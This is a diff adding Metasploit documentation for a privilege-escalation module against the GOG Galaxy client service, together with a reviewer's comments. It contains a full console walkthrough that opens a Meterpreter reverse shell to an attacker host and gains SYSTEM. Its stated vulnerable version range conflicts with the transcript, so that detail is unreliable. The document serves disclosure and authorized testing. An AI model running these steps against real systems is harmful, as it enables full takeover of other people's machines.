Land #13444, add GOG Galaxy Client Privesc
@@ -0,0 +1,81 @@
## Vulnerable Application

GOG Galaxy is a video game management client. One of its Windows services, *GalaxyClientService*, runs with *SYSTEM* privileges.
In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to
execute arbitrary commands as *SYSTEM*.

A vulnerable [version](https://www.gog.com/galaxy) need only be installed on the target machine in order to be exploitable.

## Verification Steps

1. Start *msfconsole*.
2. Acquire a Meterpreter session.
3. Do: ```use exploit/windows/local/gog_galaxyclientservice_privesc```
4. Do: ```set SESSION <session_no>```
5. Do: ```exploit```
6. Verify that you get a Meterpreter session.

## Options
### WORKING_DIR

The initial working directory of the command.

## Scenarios
### GOG Galaxy Client `v1.2.66.64` on Windows 10

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer : DESKTOP-AQT4EG1
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 15
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service. Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-AQT4EG1
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 15
Meterpreter : x64/windows
```
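Review bot: the affected-version statement under "Vulnerable Application" ("2.0.12 and earlier, and 1.2.64 and earlier") contradicts the "Scenarios" transcript, where `check` reports "Vulnerable version found: 1.2.66.64" and the exploit then succeeds; either the 1.2.x bound in the prose is wrong or the version comparison behind `check` is looser than documented, and the doc should state the range the module actually tests for. Two smaller points in the same hunk: the "Verification Steps" list never sets `payload` or `LHOST`, yet the scenario does both before `run` (add those steps, or note that the module's defaults suffice), and the `WORKING_DIR` description ("The initial working directory of the command.") should give its default and what the module does when it is left unset, since that is the one option a user is told about.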